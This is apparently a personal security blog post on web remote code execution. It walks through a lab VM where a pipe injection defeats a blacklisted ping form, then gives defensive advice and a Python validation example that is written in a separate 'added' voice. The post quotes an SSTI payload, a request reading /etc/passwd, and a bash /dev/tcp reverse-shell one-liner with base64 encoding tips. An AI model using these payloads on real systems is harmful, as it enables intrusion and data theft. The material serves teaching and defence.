Secure Your Website Against Remote Code Execution Attacks


Hello there! I’m finally done with my exams, so I have more free time to dedicate to my blog and my projects.
Not gonna waste time, let’s dive in.
Definition of Remote Code Execution (RCE)
A Remote Code Execution (RCE) vulnerability in a website allows an attacker to run malicious code on the server hosting the site. This happens when the website fails to properly validate user input, letting attackers inject and execute commands. A successful RCE can lead to full server compromise, data theft, or further attacks.
Technical Deep Dive: How Web RCE Works
RCE in web applications typically occurs due to:
Unsafe Input Handling
Directly passing user input to dangerous functions (e.g., eval(), system(), exec() in PHP/Python). Example (PHP):
$command = $_GET['cmd']; system($command); // Attacker sends whatever command and it gets executed
Deserialization Attacks
Insecure parsing of serialized objects (e.g., PHP unserialize(), Python pickle). Malicious payloads trigger code execution during deserialization.
Server-Side Template Injection (SSTI)
Injecting code into templating engines (e.g., Jinja2, Twig).
Example (Jinja2 exploit):
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
File Upload Bypasses
- Uploading malicious files (.php, .jsp) that execute when accessed.
Common Exploit Scenarios
PHP RCE via shell_exec: GET /vulnerable.php?cmd=cat+/etc/passwd
Python Flask SSTI: GET /profile?name={{7*7}} # Test for SSTI → Outputs "49"
Java Runtime.exec() Exploit: String cmd = request.getParameter("cmd"); Runtime.getRuntime().exec(cmd); // Blind RCE
But how do I know if my server is vulnerable?
For visual learners like me, I made a vulnerable VM with some vulnerabilities (SQL injection, RCE, IDOR and so on).
The site is written in Italian. Comment if you need a translation.
Here we have an admin panel, with a basic ping function.
First of all, let’s see what happens with a normal input:
As we can see, it pings www.google.com.
Now, let’s try some basic injection with & and ;.
Well, neither works (they are blacklisted).
Let’s try with the pipe command (this one: |).
The pipe (|) takes the output of one command and passes it as input to another. For example:
cat file.txt | grep "password"
It reads file.txt but only prints the lines that contain "password".
It worked. Now we can execute commands (in this case, I will retrieve the flag).
Obviously, you can use nc or socat to have a reverse shell. Doing so will hang the browser window. If the server doesn’t have netcat or socat, you can use this one:
bash -i >& /dev/tcp/yourip/yourport 0>&1
- bash -i spawns an interactive shell.
- >& /dev/tcp/yourip/yourport: >& redirects both stdout and stderr (file descriptors 1 and 2) into /dev/tcp/yourip/yourport, which opens a TCP socket connection to yourip:yourport. (Bash on Linux treats /dev/tcp/HOST/PORT as a virtual file for TCP connections.)
- 0>&1: redirects stdin (file descriptor 0) to the same TCP socket (&1 references stdout). This ensures the attacker can send commands to the shell.
I suggest you use base64 for encoding, so you are not going to have problems with encoding and stuff.
Just for demonstration, I will use the bash one (base64 encoded):
Done. We got a shell, and retrieved the flag. From there, we can do lateral pivoting or try to escalate privileges.
How can I protect myself then?
There are various methods to defend yourself:
- Input Validation: Strict whitelist filtering for user-supplied data.
- Disable Dangerous Functions: Restrict eval(), exec(), system() in PHP/Python.
- Use Safe APIs: Replace direct shell commands with library functions.
- Web Application Firewall (WAF): Block known RCE payloads.
- Least Privilege: Run the web server with minimal permissions (the user www-data should be fine, but make sure it can’t do anything apart from loading your site).
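As an added example (my code, not the post’s or the VM’s; the VM’s source is not shown, so the vulnerable form is assumed from the PHP snippet above), here is the admin panel’s ping feature in Python, once spliced into a shell line and once hardened with the whitelist validation and safe-API advice from the list above:

```python
from __future__ import annotations

import re
import subprocess

# Whitelist: a plain hostname or IPv4 literal, i.e. dot-separated labels of
# letters, digits and inner hyphens. No spaces, no '|', ';', '&', '$', '`',
# and no leading '-' (which ping would read as an option). Unlike the VM's
# blacklist of '&' and ';', this never has to enumerate the bad characters.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")


def is_valid_host(value: str) -> bool:
    """True only if value is a bare hostname/IPv4 literal of sane length."""
    return len(value) <= 253 and HOST_RE.fullmatch(value) is not None


def vulnerable_ping_command(user_input: str) -> str:
    """The admin-panel pattern (assumed; the post does not show its source):
    user text spliced into a shell line. Returned, not executed, so the
    injected '|' stays visible in the result."""
    return f"ping -c 1 {user_input}"


def safe_ping_argv(user_input: str) -> list[str]:
    """Hardened version: validate first, then build an argv list. Passed to
    subprocess with shell=False, '|', ';' and '&' are never seen by a shell;
    the validator has already refused them anyway."""
    if not is_valid_host(user_input):
        raise ValueError(f"rejected host: {user_input!r}")
    return ["ping", "-c", "1", user_input]


def run_safe_ping(user_input: str) -> subprocess.CompletedProcess:
    """Run the validated ping without a shell and with a timeout."""
    return subprocess.run(safe_ping_argv(user_input), capture_output=True,
                          text=True, timeout=10)


if __name__ == "__main__":
    # Constructed inputs: the normal one from the post, the pipe injection
    # the VM's blacklist let through, and a leading-hyphen option value.
    for sample in ["www.google.com", "www.google.com | id", "-h"]:
        verdict = "accepted" if is_valid_host(sample) else "rejected"
        print(f"{sample!r:24} -> {verdict}")
    print("vulnerable:", vulnerable_ping_command("www.google.com | id"))
    print("hardened:  ", safe_ping_argv("www.google.com"))
```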
Conclusion
RCE is critical because it bypasses front-end security, granting direct server access. Always audit code for uncontrolled input usage, analyze traffic with Wireshark or tcpdump, and check for weird or unusual connections.
Written by proxydom
Italian college student who loves cats, beer and ethical hacking.